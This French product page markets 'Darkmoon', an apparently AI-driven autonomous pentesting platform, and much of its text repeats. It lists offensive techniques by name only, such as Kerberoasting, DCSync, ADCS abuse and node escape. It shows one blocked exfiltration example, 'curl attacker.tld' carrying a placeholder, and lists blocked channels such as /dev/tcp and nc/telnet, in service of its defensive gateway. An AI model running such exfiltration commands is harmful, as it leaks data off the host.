Trouver la cause racine
Un audit de sécurité en trois phases relie chaque finding prouvé du sink vulnérable jusqu'à sa cause racine dans le code de la cible. Uniquement des problèmes de sécurité, aucun bruit de style.
Darkmoon mène toute la campagne offensive sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, puis qualifie chaque finding EXPLOITÉ, CONFIRMÉ ou NON CONFIRMÉ via une grille adversariale.
140+ outils de sécurité, tous derrière une allow-list vérifiée au build
Campaign · camp_20260426_3d2f… · 26 Apr 2026, Refresh
Severity critical high medium low info, PR remediation
Infrastructure, Live Campaign, Vulnerabilities, Dashboard, Scheduler, History
Your projectsDarkmoon Assessm…, Darkmoon Demo, Admin
Internet-facingServer (Internet), Web Server, Web Server (HTTPS), Reverse Proxy, Target, WebSocket
Web Application 37, Metrics 2, API Docs, Frontend, Realtime, NoSQL Store
Data & secretsDatabase 8, Admin Config 3, Session Key 3, Files (/ftp) 4
L'orchestrateur identifie la stack de votre cible et dépêche automatiquement les bons spécialistes, du web et du cloud à l'Active Directory, Kubernetes, la CI/CD et le firmware. Un agent llm dédié couvre l'OWASP LLM Top 10, et en Pro un agent de remédiation transforme les findings confirmés en pull requests de correctif validées en sandbox, à relire par votre équipe.
Web & API
SQLi, XSS, SSRF, IDOR, RCE, SSTI, désérialisation, abus JWT, upload de fichier et path traversal, validés avec de vrais payloads, jamais des signatures.
Lancer un pentest web & API full-stack
Active Directory · AWS · Azure · GCP
AS-REP roasting, Kerberoasting, relais NTLM, DCSync et ADCS ESC1-ESC8, plus minting de token IMDS, extraction Key Vault et pivots ROPC, chacun prouvé avec l'appel exact.
Compromettre l'Active Directory et le cloud
Embarqué · Kubernetes · LLM/MCP
Extraction binwalk/squashfs, récupération de backdoor et exploitation de routeurs, RBAC Kubernetes et évasion de nœud, et un agent llm dédié à l'OWASP LLM Top 10.
Scanner firmware, Kubernetes et la couche LLM
Agent [#01] · Web
Dépêchés par l'orchestrateur
Darkmoon raisonne sur votre cible, modélise la surface d'attaque et dépêche les bons agents sur le web, le cloud, l'identité, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, avec un contrôle complet en cascade.
L'orchestrateur identifie 14 signaux technologiques et route la campagne vers les bons spécialistes sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, en séquentiel ou en parallèle, avec une cascade plafonnée à trois niveaux pour éviter toute récursion infinie.
En savoir plusL'agent de remédiation Pro de Darkmoon prend le relais là où le pentest s'arrête. Pour chaque finding confirmé, il audite le code source de la cible à la recherche de la cause racine, écrit le correctif minimal, le prouve dans un sandbox éphémère et ouvre une pull request que votre équipe relit. Il ne merge jamais de lui-même.
Un audit de sécurité en trois phases relie chaque finding prouvé du sink vulnérable jusqu'à sa cause racine dans le code de la cible. Uniquement des problèmes de sécurité, aucun bruit de style.
L'exploit est reproduit sur un build neuf, le correctif appliqué, puis l'exploit et ses variantes rejoués pour prouver qu'ils échouent désormais, tandis que le comportement normal de l'application et ses tests passent toujours.
Un patch minimal ciblant la cause racine est poussé sur une branche et une pull request est ouverte, portant la preuve avant/après. GitHub, GitLab, Gitea, Bitbucket et Azure DevOps sont pris en charge.
Chaque pull request est une proposition qu'une personne relit et merge. Darkmoon ne merge jamais automatiquement, et tout correctif qu'il n'a pas pu valider entièrement est ouvert en draft clairement identifié.
Dans le dashboard, chaque finding gagne une colonne PR reliant la pull request qui le corrige : URL de la forge, état, findings liés, diff stat et la validation avant/après.
Les identifiants de push sont scellés au repos et résolus localement. L'exécution ne porte qu'une référence opaque, jamais le token, si bien que votre secret n'entre jamais dans le contexte du modèle.
Il rejoint un roster de 52 agents : un orchestrateur, 50 spécialistes offensifs (web, cloud, Active Directory, Kubernetes, bases de données et un agent llm qui déroule l'OWASP LLM Top 10 contre les endpoints d'inférence IA/LLM exposés) et cet agent de remédiation Pro.
Périmètre défini, agents dépêchés, findings qualifiés, rapport livré. Pas une démonstration de fonctionnalités : le produit qui tourne sur une vraie cible.
Open source au cœur. Une licence pour exécuter la plateforme autonome complète.
Open source, auto-hébergé à vie
StarGratuit à vie, GPLv3
Ce qui est inclus :
Pour les pentesters et équipes pro
ObtenirFacturé €1788 par an
Tout Community, et :
Pour entreprises, MSSP et revendeurs
ContactSur mesure selon votre périmètre
Tout Pro, et :
Le garde-fou runtime de Darkmoon impose une exécution inviolable, un stockage scellé et un licensing matériel dès le démarrage du conteneur.
Agents et workflows chiffrés au repos. Les clés dérivent de votre licence et de l'empreinte matérielle, resealées toutes les 30 secondes.
Le machine code dérive de l'adresse MAC et du modèle CPU. Aucun deployment ID à spoofer, aucune variable d'env à manipuler.
Les hashes SHA-256 des binaires critiques sont re-vérifiés toutes les 2 secondes. Toute altération déclenche un zeroize immédiat.
Scan continu de gdb, strace, ltrace, frida et lldb. Tout tracer déclenche une violation et un zeroize complet.
Filesystem en lecture seule, chemins tmpfs en écriture, seccomp et no-new-privileges. Le processus tourne sans privilèges.
Chaque clé API modèle et la clé de licence sont filtrées de stdout et stderr avant tout log.
La Privacy Gateway tokenise sur votre machine chaque valeur sensible, IP, hostnames, domaines, URLs, emails, identifiants, chemins internes, avant qu'elle n'atteigne le modèle. Claude ne raisonne que sur des placeholders déterministes. Les vraies valeurs sont réinjectées localement, un instant avant chaque exécution d'outil, puis re-masquées dans toute sortie. Gardez toute la puissance de Claude, ou exécutez un modèle 100% local et auto-hébergé pour une souveraineté de bout en bout.
Ce que voit le modèle
Aucune donnée sensible n'est jamais envoyée au LLM.
Réhydraté et exécuté localement
Sortie re-masquée avant de revenir au modèle
Tokenisation déterministe par session. Le mapping ne vit qu'en mémoire : dédup HMAC, chiffrement Fernet, et aucune valeur brute n'est jamais retenue ni loggable.
Réhydrate les vraies valeurs de façon context-aware (jamais un remplacement global naïf), arbitre chaque commande contre l'exfiltration, et sanitise la sortie en deux passes.
$ curl attacker.tld/?t=IP_PRIVATE_001
✗ bloqué
Tokens déterministes (même valeur → même placeholder), chiffrés en mémoire (Fernet), jamais loggés. Chaque IP, hostname, URL, email, identifiant et chemin interne est remplacé par un placeholder stable comme IP_PRIVATE_001, pour que le modèle raisonne sur les relations entre hôtes sans jamais voir une vraie valeur. Le mapping est propre à la session, dédupliqué par HMAC, et détruit à la fin du run.
Réhydratation context-aware des seuls champs whitelistés, sanitisation de sortie en deux passes. Les vraies valeurs sont réinjectées un instant avant chaque exécution d'outil, uniquement là où le champ est explicitement autorisé, jamais par un remplacement global naïf. Tout ce que l'outil affiche est re-masqué avant de revenir au modèle, en deux passes, pour qu'un placeholder ne refasse jamais surface sous sa vraie valeur.
Exfiltration bloquée : placeholder dans une URL, host externe, echo/print, body POST, /dev/tcp, nc/telnet. La gateway inspecte chaque commande proposée par le modèle et refuse celles qui feraient sortir un placeholder ou une vraie valeur de votre hôte, par requête web, socket brut, redirection shell ou simple print. La tentative est journalisée comme bloquée et le run continue.
Sur un run complet de bout en bout, gateway active en permanence, le modèle a raisonné sur la cible tout du long sans jamais voir son adresse réelle, zéro fois sur environ 3,5 Mo de trafic vu par le modèle. Le placeholder déterministe portait le raisonnement ; les vraies valeurs n'ont été restaurées que sur votre hôte, dans le rapport final. Un run mesuré, pas une garantie absolue.
Tokenisation réversible + gateway anti-exfiltration en open-source. Vault scellé, audit trail des réhydratations et preuve de conformité en Pro.
L'architecture de Darkmoon est sa garantie de sécurité, et elle est entièrement auditable. L'IA raisonne et rédige le plan. Une passerelle MCP arbitre chaque appel d'outil. Lisez-le, puis exécutez-le vous-même.
Faites de votre infrastructure un nœud de sécurité autonome dédié. Software-defined. Auto-hébergé. Aucun matériel propriétaire.
Software-defined · Self-hosted · No proprietary hardware
Le même moteur open source, branché à votre IDE, votre CI/CD, votre automatisation et votre stack SecOps. Chaque surface détecte son édition : le CLI communautaire lit votre rapport JSON local ; l'offre Pro payante ajoute l'API REST en direct, le streaming et la remédiation.
Auto-hébergez la plateforme, commandez un engagement managé ou revendez-la à vos propres clients.
Exécutez la plateforme complète sur votre propre infra. Licence matérielle, install Docker, mensuel ou annuel.
Décrivez votre cible, signez le cadre en ligne, payez un forfait. Nos experts l'exécutent et livrent un rapport débriefé.
Revendez Darkmoon sous votre propre habillage commercial. Un dashboard, toutes les licences, facturation Stripe intégrée.
Décrivez votre cible, signez le cadre en ligne, payez un forfait, nos experts mènent l'engagement offensif de bout en bout et livrent un rapport débriefé et étayé par des preuves dans votre espace client sécurisé.
Darkmoon orchestre une campagne offensive de bout en bout, il raisonne sur la cible, dépêche des spécialistes par domaine, valide les findings avec de vrais payloads, construit un graphe d'infrastructure et produit un rapport structuré. Un scanner exécute des signatures en une passe. Darkmoon exécute un pentest.
Par design. Le modèle planifie et raisonne, mais chaque invocation d'outil passe par une passerelle MCP qui valide et arbitre l'appel. Le modèle n'exécute jamais directement un shell, ce qui rend l'engagement auditable, borné et sûr. Toute l'architecture est open source.
Oui. Le moteur est publié sur GitHub sous ASCIT31/Dark-Moon, licence GPLv3. Vous pouvez lire la logique d'orchestration, les playbooks d'agents et la couche MCP, et l'auto-héberger. La licence commerciale ajoute le runtime durci, le dashboard managé et le support.
Standard ISO 27001, HackerOne, Bugcrowd (VRT / P1–P5) et un format custom. Chaque rapport inclut scoring CVSS 3.1, mapping MITRE ATT&CK, contrôles ISO 27001, preuves brutes et guidance de remédiation. L'export PDF est brandé et protégé par mot de passe.
Darkmoon utilise un licensing matériel. Votre clé de licence est liée à une empreinte machine dérivée de votre matériel (adresse MAC, modèle CPU), elle ne peut être ni clonée ni déplacée vers une autre machine en changeant une variable d'environnement.
Darkmoon inclut des niveaux de bruit configurables (stealth, low, moderate), un mode safe-harbor, l'application de l'out-of-scope et la propagation du scope par agent. Le runtime est durci avec un filesystem read-only, seccomp, no-new-privileges et watchdog continu.
Tests d'intrusion autonomes et continus
50 agents IA spécialistes, 140+ outils de sécurité et un command center en direct. Darkmoon mène toute la campagne offensive sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, puis qualifie chaque finding EXPLOITÉ, CONFIRMÉ ou NON CONFIRMÉ via une grille adversariale.
140+ outils de sécurité, tous derrière une allow-list vérifiée au build
L'agent de remédiation Pro de Darkmoon prend le relais là où le pentest s'arrête. Pour chaque finding confirmé, il audite le code source de la cible à la recherche de la cause racine, écrit le correctif minimal, le prouve dans un sandbox éphémère et ouvre une pull request que votre équipe relit. Il ne merge jamais de lui-même.
Un audit de sécurité en trois phases relie chaque finding prouvé du sink vulnérable jusqu'à sa cause racine dans le code de la cible. Uniquement des problèmes de sécurité, aucun bruit de style.
L'exploit est reproduit sur un build neuf, le correctif appliqué, puis l'exploit et ses variantes rejoués pour prouver qu'ils échouent désormais, tandis que le comportement normal de l'application et ses tests passent toujours.
Un patch minimal ciblant la cause racine est poussé sur une branche et une pull request est ouverte, portant la preuve avant/après. GitHub, GitLab, Gitea, Bitbucket et Azure DevOps sont pris en charge.
Chaque pull request est une proposition qu'une personne relit et merge. Darkmoon ne merge jamais automatiquement, et tout correctif qu'il n'a pas pu valider entièrement est ouvert en draft clairement identifié.
Dans le dashboard, chaque finding gagne une colonne PR reliant la pull request qui le corrige : URL de la forge, état, findings liés, diff stat et la validation avant/après.
Les identifiants de push sont scellés au repos et résolus localement. L'exécution ne porte qu'une référence opaque, jamais le token, si bien que votre secret n'entre jamais dans le contexte du modèle.
Il rejoint un roster de 52 agents : un orchestrateur, 50 spécialistes offensifs (web, cloud, Active Directory, Kubernetes, bases de données et un agent llm qui déroule l'OWASP LLM Top 10 contre les endpoints d'inférence IA/LLM exposés) et cet agent de remédiation Pro.
Voir le benchmark de remédiation Pro : des correctifs prouvés en rejouant l'exploit · Comparer Darkmoon aux autres outils de pentest IA
Périmètre défini, agents dépêchés, findings qualifiés, rapport livré. Pas une démonstration de fonctionnalités : le produit qui tourne sur une vraie cible.
Darkmoon raisonne sur votre cible, modélise la surface d'attaque et dépêche les bons agents sur le web, le cloud, l'identité, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, avec un contrôle complet en cascade.
L'orchestrateur identifie 14 signaux technologiques et route la campagne vers les bons spécialistes sur le web, le cloud, l'Active Directory, Kubernetes, la CI/CD, le firmware et les endpoints IA/LLM, en séquentiel ou en parallèle, avec une cascade plafonnée à trois niveaux pour éviter toute récursion infinie.
En savoir plusOpen source au cœur. Une licence pour exécuter la plateforme autonome complète.
Open source, auto-hébergé à vie
StarGratuit à vie, GPLv3
Ce qui est inclus :
Pour les pentesters et équipes pro
ObtenirFacturé €1788 par an
Tout Community, et :
Pour entreprises, MSSP et revendeurs
ContactSur mesure selon votre périmètre
Tout Pro, et :
L'orchestrateur identifie la stack de votre cible et dépêche automatiquement les bons spécialistes, du web et du cloud à l'Active Directory, Kubernetes, la CI/CD et le firmware. Un agent llm dédié couvre l'OWASP LLM Top 10, et en Pro un agent de remédiation transforme les findings confirmés en pull requests de correctif validées en sandbox, à relire par votre équipe.
SQLi, XSS, SSRF, IDOR, RCE, SSTI, désérialisation, abus JWT, upload de fichier et path traversal, validés avec de vrais payloads, jamais des signatures.
AS-REP roasting, Kerberoasting, relais NTLM, DCSync et ADCS ESC1-ESC8, plus minting de token IMDS, extraction Key Vault et pivots ROPC, chacun prouvé avec l'appel exact.
Extraction binwalk/squashfs, récupération de backdoor et exploitation de routeurs, RBAC Kubernetes et évasion de nœud, et un agent llm dédié à l'OWASP LLM Top 10.
Le garde-fou runtime de Darkmoon impose une exécution inviolable, un stockage scellé et un licensing matériel dès le démarrage du conteneur.
Agents et workflows chiffrés au repos. Les clés dérivent de votre licence et de l'empreinte matérielle, resealées toutes les 30 secondes.
Le machine code dérive de l'adresse MAC et du modèle CPU. Aucun deployment ID à spoofer, aucune variable d'env à manipuler.
Les hashes SHA-256 des binaires critiques sont re-vérifiés toutes les 2 secondes. Toute altération déclenche un zeroize immédiat.
Scan continu de gdb, strace, ltrace, frida et lldb. Tout tracer déclenche une violation et un zeroize complet.
Filesystem en lecture seule, chemins tmpfs en écriture, seccomp et no-new-privileges. Le processus tourne sans privilèges.
Chaque clé API modèle et la clé de licence sont filtrées de stdout et stderr avant tout log.
La Privacy Gateway tokenise sur votre machine chaque valeur sensible, IP, hostnames, domaines, URLs, emails, identifiants, chemins internes, avant qu'elle n'atteigne le modèle. Claude ne raisonne que sur des placeholders déterministes. Les vraies valeurs sont réinjectées localement, un instant avant chaque exécution d'outil, puis re-masquées dans toute sortie. Gardez toute la puissance de Claude, ou exécutez un modèle 100% local et auto-hébergé pour une souveraineté de bout en bout.
Aucune donnée sensible n'est jamais envoyée au LLM.
Tokens déterministes (même valeur → même placeholder), chiffrés en mémoire (Fernet), jamais loggés. Chaque IP, hostname, URL, email, identifiant et chemin interne est remplacé par un placeholder stable comme IP_PRIVATE_001, pour que le modèle raisonne sur les relations entre hôtes sans jamais voir une vraie valeur. Le mapping est propre à la session, dédupliqué par HMAC, et détruit à la fin du run.
Réhydratation context-aware des seuls champs whitelistés, sanitisation de sortie en deux passes. Les vraies valeurs sont réinjectées un instant avant chaque exécution d'outil, uniquement là où le champ est explicitement autorisé, jamais par un remplacement global naïf. Tout ce que l'outil affiche est re-masqué avant de revenir au modèle, en deux passes, pour qu'un placeholder ne refasse jamais surface sous sa vraie valeur.
Exfiltration bloquée : placeholder dans une URL, host externe, echo/print, body POST, /dev/tcp, nc/telnet. La gateway inspecte chaque commande proposée par le modèle et refuse celles qui feraient sortir un placeholder ou une vraie valeur de votre hôte, par requête web, socket brut, redirection shell ou simple print. La tentative est journalisée comme bloquée et le run continue.
Sur un run complet de bout en bout, gateway active en permanence, le modèle a raisonné sur la cible tout du long sans jamais voir son adresse réelle, zéro fois sur environ 3,5 Mo de trafic vu par le modèle. Le placeholder déterministe portait le raisonnement ; les vraies valeurs n'ont été restaurées que sur votre hôte, dans le rapport final. Un run mesuré, pas une garantie absolue.
Tokenisation réversible + gateway anti-exfiltration en open-source. Vault scellé, audit trail des réhydratations et preuve de conformité en Pro.
L'architecture de Darkmoon est sa garantie de sécurité, et elle est entièrement auditable. L'IA raisonne et rédige le plan. Une passerelle MCP arbitre chaque appel d'outil. Lisez-le, puis exécutez-le vous-même.
Faites de votre infrastructure un nœud de sécurité autonome dédié. Software-defined. Auto-hébergé. Aucun matériel propriétaire.
Le même moteur open source, branché à votre IDE, votre CI/CD, votre automatisation et votre stack SecOps. Chaque surface détecte son édition : le CLI communautaire lit votre rapport JSON local ; l'offre Pro payante ajoute l'API REST en direct, le streaming et la remédiation.
Exécutez la plateforme complète sur votre propre infra. Licence matérielle, install Docker, mensuel ou annuel.
Décrivez votre cible, signez le cadre en ligne, payez un forfait. Nos experts l'exécutent et livrent un rapport débriefé.
Revendez Darkmoon sous votre propre habillage commercial. Un dashboard, toutes les licences, facturation Stripe intégrée.
Décrivez votre cible, signez le cadre en ligne, payez un forfait, nos experts mènent l'engagement offensif de bout en bout et livrent un rapport débriefé et étayé par des preuves dans votre espace client sécurisé.
Darkmoon orchestre une campagne offensive de bout en bout, il raisonne sur la cible, dépêche des spécialistes par domaine, valide les findings avec de vrais payloads, construit un graphe d'infrastructure et produit un rapport structuré. Un scanner exécute des signatures en une passe. Darkmoon exécute un pentest.
Par design. Le modèle planifie et raisonne, mais chaque invocation d'outil passe par une passerelle MCP qui valide et arbitre l'appel. Le modèle n'exécute jamais directement un shell, ce qui rend l'engagement auditable, borné et sûr. Toute l'architecture est open source.
Oui. Le moteur est publié sur GitHub sous ASCIT31/Dark-Moon, licence GPLv3. Vous pouvez lire la logique d'orchestration, les playbooks d'agents et la couche MCP, et l'auto-héberger. La licence commerciale ajoute le runtime durci, le dashboard managé et le support.
Standard ISO 27001, HackerOne, Bugcrowd (VRT / P1–P5) et un format custom. Chaque rapport inclut scoring CVSS 3.1, mapping MITRE ATT&CK, contrôles ISO 27001, preuves brutes et guidance de remédiation. L'export PDF est brandé et protégé par mot de passe.
Darkmoon utilise un licensing matériel. Votre clé de licence est liée à une empreinte machine dérivée de votre matériel (adresse MAC, modèle CPU), elle ne peut être ni clonée ni déplacée vers une autre machine en changeant une variable d'environnement.
Darkmoon inclut des niveaux de bruit configurables (stealth, low, moderate), un mode safe-harbor, l'application de l'out-of-scope et la propagation du scope par agent. Le runtime est durci avec un filesystem read-only, seccomp, no-new-privileges et watchdog continu.
Visibilité en direct, preuves validées et un rapport actionnable par votre équipe le jour même.